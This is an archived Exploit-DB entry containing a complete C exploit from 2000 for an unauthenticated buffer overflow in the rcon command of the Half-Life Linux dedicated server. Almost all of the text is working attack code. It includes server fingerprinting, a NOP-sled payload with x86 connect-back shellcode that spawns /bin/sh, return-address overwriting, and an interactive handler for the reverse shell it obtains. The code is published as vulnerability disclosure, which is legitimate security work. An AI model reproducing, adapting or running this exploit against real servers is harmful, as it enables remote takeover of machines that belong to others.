Half Life - 'rcon' Remote Buffer Overflow

EDB-ID:

181

CVE:


Author:

Sao Paulo

Type:

remote

Platform:

Linux

Published:

2000-11-16

/*
 *  SDI HalfLife rcon remote exploit for linux x86
 *  (portuguese) exploit remoto para o buffer overflow do rcon no halflife
 *  
 *  Tamandua Sekure Labs (Sao Paulo - Porto Alegre, Brazil)
 *  by Thiago Zaninotti (c0nd0r) <condor@sekure.org>
 *     Gustavo Scotti   (csh)    <csh@sekure.org>
 *  
 *  Proof of concept - There is a remote exploitable buffer overflow
 *  in Half Life server (3.1.0.x) for linux (HLDS). The problem is 
 *  related to the RCON command (Remote CONsole).
 *  (port.) Existe um buffer overflow exploitavel no Half Life Server
 *  (HLDS) relacionado ao comando RCON.
 *  
 *  After several tests, we found out the 'rcon' command is also vulnerable
 *  to a format string attack which can also lead to a remote exploit.
 *  (port) O comando RCON tambem e' vulneravel a um format string attack.
 *  
 *  YOU DO NOT NEED THE RCON PASSWORD TO EXPLOIT THIS VULNERABILITY, 
 *  which means any multiplayer server is vulnerable to the attack.
 *  (port) Voce nao precisa de password para explorar esta vulnerabilidade,
 *    o que significa que qualquer servidor e' vulneravel.
 *  
 *  Agradecimentos: Tamandua Sekure Labs, Fabio Ramos (framos@axur.org), 
 *  Eduardo Freitas, Marcos Sposito, Roberto Monteiro (casper),
 *  Nelson Britto (stderr), Sabrina Monteiro, Gabriel Zaninotti e 
 *  Felipe Salum. A todos os leitores da Best of Security Brasil (BOS-BR).
 *  
 *  Respects: c_orb, el8.org (specially duke), meta, guys at core sdi, 
 *  the "infame" TOXYN.ORG (pt rocks) - r00t, pr0m, horizon, plaguez, 
 *  ratao and p.ulh.as/promisc.net crew. Greetz to AXUR.ORG too! guys at
 *  sekure.org: vader, jamez, falcon and staff.
 *  
 *  also thanks to botman (botman@mailandnews.com).
 *  Visit the brazilian security portal: http://www.securenet.com.br
 */

#include <stdlib.h>
#include <stdio.h>
#include <netinet/in.h>
#include <sys/socket.h>
#include <sys/time.h>
#include <netdb.h>

typedef unsigned long	u32;
typedef unsigned short	u16;
typedef unsigned char	u8;

unsigned char shellcode[]=
  "\xeb\x03\x5e\xeb\x1d\xe8\xf8\xff\xff\xff scotti@axur.org"
  "\x2f\x62\x69\x6e\x2f"
  "\x73\x68\x40\x31\xc0\x66\x40\x66\x40\x66\x89\x06\x31\xc9\xb1\x08"
  "\x89\xf7\x83\xc7\x08\x30\xc0\x88\x07\x47\x49\x75\xfa\x31\xc0\x89"
  "\x46\x28\x40\x89\x46\x24\x40\x89\x46\x20\x8d\x4e\x20\x31\xdb\x43"
  "\x31\xc0\x83\xc0\x66\xcd\x80\x89\xc7\x89\x46\x20\x8d\x06\x89\x46"
  "\x24\x31\xc0\x83\xc0\x10\x89\x46\x28\x8d\x4e\x20\x31\xdb\x43\x43"
  "\x43\x31\xc0\x83\xc0\x66\x57\xcd\x80\x5f\x31\xc0\x83\xc0\x3f\x89"
  "\xfb\x31\xc9\xcd\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\xcd"
  "\x80\x31\xc0\x83\xc0\x3f\x31\xdb\x31\xc9\x41\x41\xcd\x80\x89\xf0"
  "\x83\xc0\x18\x89\x46\x18\x31\xc0\x88\x46\x17\x89\x46\x1c\xb0\x0b"
  "\x8d\x4e\x18\x8d\x56\x1c\x89\xf3\x83\xc3\x10\xcd\x80\x31\xc0\x40"
  "\xcd\x80";

/* NET functions */
int
udp_read( int sock, u32 *daddr, u16 *port, void *ptr, u16 ptr_size)
{
        struct sockaddr_in server;
        int i,n;
        i = sizeof(server);
        n=recvfrom( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, &i);
        *daddr = ntohl(server.sin_addr.s_addr);
        *port = ntohs(server.sin_port);
        return n;
}

int
udp_send( int sock, u32 daddr, u16 port, void *ptr, u16 ptr_size)
{
        struct sockaddr_in server;
        server.sin_family = AF_INET;
        server.sin_port = htons( port);
        server.sin_addr.s_addr = htonl( daddr);
        return sendto( sock, ptr, ptr_size, 0, (struct sockaddr *)&server, sizeof(server));
}

int
udp_connect( u32 addr, u16 port)
{
        struct sockaddr_in client;
        int new_fd;

        new_fd = socket( AF_INET, SOCK_DGRAM, 0);
        if (new_fd<0)
           return new_fd;

        bzero( (char *) &client, sizeof( client));
        client.sin_family = AF_INET;
        client.sin_addr.s_addr = htonl( addr);
        client.sin_port = htons( port);
        if (connect( new_fd, (struct sockaddr *)&client, sizeof(client))<0)
           return -1; /* cant bind local address */

        return new_fd;
}

u32 dns2ip( u8 *host)
{
        struct hostent *dns;
        u32     saddr;
        dns = gethostbyname( host);
        if (!dns)
           return 0xffffffff;
        bcopy( (char *)dns->h_addr, (char *)&saddr, dns->h_length);
        return ntohl(saddr);
}

int
async_read( int sock_r, int rettime)
{
   fd_set           fd_r;
   struct timeval   tv;
   char             try_ch[4]="/-\\|";

   int r,j;

   for (r=0;r<rettime;r++)
       {
       for (j=0;j<20;)
           {
           int i;

           printf("\b%c", try_ch[(j%4)]);
           fflush(stdout);

           FD_ZERO( &fd_r);
           FD_SET( sock_r, &fd_r);

	   tv.tv_sec  = 0;
	   tv.tv_usec = 50000;
           
	   i =select( sock_r + 1, &fd_r, NULL, NULL, &tv);
           if (!i) { j++; continue; }
           if (i>0)
	      if (FD_ISSET(sock_r, &fd_r)) return sock_r;
           else
              return -1;
           }
       }
   return -1;
}

int
get_server_info( int sock, u32 addr, u16 port)
{
   u32 r_addr;
   u16 r_port;
   int n, i;
   u8  pkt[256], *str;

   pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
   sprintf(&pkt[4], "details");

   n = udp_send(sock, addr, port, pkt, strlen(pkt));
   printf(".  connecting to the server...  "); fflush(stdout);
   if (async_read(sock, 6)<0)
       goto server_down;
   n = udp_read(sock, &addr, &port, pkt, sizeof(pkt));
   if (n<0)
	{
server_down:
	printf("\bserver down!\r*\n");
	exit(0);
	}
   printf("\bdone\n");
   str = &pkt[4]; 
   str+=strlen(str)+1;
   printf("\t server_name  [%s]\n", str); str+=strlen(str)+1;
   printf("\t    map_name  [%s]\n", str); str+=strlen(str)+1;
   str+=strlen(str)+1;

   printf("\t   game_name  [%s]\n", str); str+=strlen(str)+1;
   printf("\tusers_online  [%d of %d]\n", str[0], str[1]); str+=3;
   printf("\t   remote_OS  [%s]\n", (str[1]=='w' ? "windows" : (str[1]=='l' ? "linux" : "unknown")));
   if (str[1]=='w') return 2;
   if (str[1]=='l') return 1;
   return 0;
}

u32 retrieve_local_info(int sock, u8 *host)
{
   struct sockaddr_in server;
   int    soclen;
   soclen = sizeof(server);
   if (getsockname(sock, (struct sockaddr *)&server, &soclen)<0)
       {
       printf("error in getsockname\n");
       exit(0);
       }
   snprintf(host, 256, "%s:%d", inet_ntoa(server.sin_addr), htons(server.sin_port));
   return htonl(server.sin_addr.s_addr);
}

int 
bind_tcp( int *port)
{
   struct sockaddr_in mask_addr;
   int sock, portno=25000; /* base_port */

   sock = socket( AF_INET, SOCK_STREAM, 0);
   if (sock<0)
      return sock;

redo:
   mask_addr.sin_family = AF_INET;
   mask_addr.sin_port = htons( portno);
   mask_addr.sin_addr.s_addr = 0;

   if (bind(sock, (struct sockaddr *)&mask_addr, sizeof(mask_addr))<0)
      {
error:
      portno++;
      if (portno>26000)
         {
         printf("*  no TCP port to bind in.\n");
         exit(0);
         }
      goto redo;
      }
   if (listen( sock, 0)<0)
      goto error;

   printf(".  TCP listen port number %d\n", portno);
   *port = portno;
   return sock;
}

wait_for_connect(int sock)
{
   fd_set fds;
   u8     tmp[256];
   int    tcp, addr_len;
   struct sockaddr_in server;

   printf(".  waiting for connect_back shellcode responde...  ");
   if (async_read(sock, 15)!=sock)
	{
  	printf("\bfailed!\r*\n");
        exit(0);
        }
    tcp = accept( sock, (struct sockaddr *)&server, &addr_len);
    printf("\bconnected\n.       ^---> from %s:%d\n", inet_ntoa(server.sin_addr), ntohs(server.sin_port));
    close(sock); /* closing incoming socket */
    printf(".  congratulations. you have owned this one.\n");

    
    /* basic async mode */
    while (1)
        {
        FD_ZERO(&fds);
        FD_SET(0, &fds);
        FD_SET(tcp, &fds);
       
        if (select(tcp+1, &fds, NULL, NULL, NULL)>0)
           {
           if (FD_ISSET(0, &fds))
              {
              int n;
              n = read(0, tmp, 256);
              if (n<0)
                 goto end_conn;
              if (write(tcp, tmp, n)!=n) goto end_conn;
              }
           if (FD_ISSET(tcp, &fds))
              {
              int n;
              n = read(tcp, tmp, 256);
              if (n<0)
                 goto end_conn;

              if (write(0, tmp, n)!=n) goto end_conn;
              }
	   }
	}
end_conn:
    close(tcp);
    printf(".  bye-bye. Stay tuned for more Tamandua Sekure Labs codes.\n");  
}

assembly_shell_code(int sock, u32 addr, u16 port, u32 laddr, u8 *linfo)
{
   u8    pkt[2048], 
         *shell_ptr;
   struct sockaddr_in *sc_server;
   u32   ret_addr = 0xbfffb1f4, last_byte = 1014, over_head = 40;
   int   i, n, tcp, tcp_port;

   printf(".  localinfo %s\n", linfo);
   tcp = bind_tcp( &tcp_port);
   sc_server = (struct sockaddr_in *)&shellcode[10];
   sc_server->sin_addr.s_addr = htonl(laddr);
   sc_server->sin_port = htons(tcp_port);

   last_byte-=strlen(linfo);
   pkt[0] = pkt[1] = pkt[2] = pkt[3] = 0xff;
   sprintf( &pkt[4], "rcon ");
   i = strlen(pkt);
   shell_ptr = &pkt[i];

   /* find out how many nops we can push before shellcode */
   n = last_byte - i - sizeof(shellcode)-1 - over_head;
   for (i=0;i<n;i++)
       shell_ptr[i] = 0x90; /* nop */
   shell_ptr+=i;

   /* fill in the shellcode */
   for (i=0;i<sizeof(shellcode)-1;i++)
       shell_ptr[i] = shellcode[i];
   shell_ptr+=i;

   /* fill in the overhead buffer */
   for (i=0;i<over_head;i++)
       shell_ptr[i] = '-';
   shell_ptr+=i;

   /* fill return address and ebp */
   *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;
   *(u32 *)shell_ptr = ret_addr; shell_ptr+=4;

   /* finalize string */
   *shell_ptr = 0;

   n = udp_send( sock, addr, port, pkt, strlen(pkt));
   printf(".  sending poison code. %d bytes sent\n",n);
   wait_for_connect(tcp);
}

usage()
{
   printf("\n.  usage: hl-rcon <server ip[:port]>\n");
   exit(-1);
}

main(int argc, char **argv)
{
   u32 addr, laddr;
   u16 port;

   int sock, i;
   u8  linfo[256], *tmp = NULL;

   printf(".  half-life 3.1.0.x remote buffer-overflow for linux x86\n");
   printf(".  (c)2000, Tamandua Sekure Laboratories\n");
   printf(".  Authors: Thiago Zaninotti & Gustavo Scotti\n");

   if (argc<2)
      usage();

   tmp = (u8 *)strchr(argv[1], ':');
   if (tmp)
      {
      *tmp = 0; tmp++;
      port = atoi(tmp);
      }
   else
      {
      printf(":  port not found, using default 27015\n");
      port = 27015;
      }

   addr = dns2ip(argv[1]);

   if (addr==0xffffffff)
      {
      printf("host not found!\n");
      exit(0);
      }

   sock = udp_connect( addr, port);
   laddr = retrieve_local_info(sock, linfo);
   if (get_server_info(sock, addr, port)!=1)
      {
      printf("this is not a linux server. Make a shellcode to it and have fun\n");
      exit(0);
      }
   assembly_shell_code(sock, addr, port, laddr, linfo); 
   
}

// milw0rm.com [2000-11-16]